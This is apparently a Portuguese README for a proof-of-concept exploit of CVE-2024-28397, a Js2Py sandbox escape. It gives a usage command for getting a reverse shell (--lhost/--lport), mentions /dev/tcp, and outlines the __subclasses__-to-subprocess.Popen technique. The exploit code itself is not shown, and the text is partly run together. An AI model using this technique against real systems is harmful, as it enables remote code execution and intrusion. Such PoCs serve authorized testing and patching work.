Este repositório contém uma Prova de Conceito (PoC) para a CVE-2024-28397, uma vulnerabilidade na biblioteca js2py que permite um escape do sandbox para alcançar execução remota de código.
Descrição
Este repositório contém uma Prova de Conceito (PoC) baseada em Python para a CVE-2024-28397, uma vulnerabilidade de escape de sandbox no interpretador JavaScript Js2Py para Python. Quando o aplicativo alvo avalia código JS não confiável via Js2Py, um atacante pode escapar da sandbox e executar código Python arbitrário. Isso pode ser usado para obter execução remota de código (RCE) e um reverse shell no sistema vulnerável.
Este exploit foi inspirado no projeto de Marven11 CVE-2024-28397-js2py-Sandbox-Escape.
Aviso Legal
Este script é fornecido apenas para fins educacionais e de teste de penetração autorizados. O uso não autorizado deste script contra sistemas que você não possui ou não tem permissão explícita para testar é ilegal e antiético. O autor não assume nenhuma responsabilidade por uso indevido ou danos causados por este script.
Sobre a Vulnerabilidade
__class__.__base__.__subclasses__, levando à execução arbitrária de códigoFuncionalidades
Requisitos
requests (pip install requests)/dev/tcp)Uso
python3 exploit.py --target http://example.htb --lhost 10.10.14.51 --lport 4444
--target: A URL completa do endpoint da aplicação web vulnerável--lhost: Seu endereço IP local (usado para o reverse shell)--lport: Sua porta local para receber o shellComo Funciona
__class__.__base__.__subclasses__() para encontrar subprocess.Popen.Popen para decodificar e executar o shell.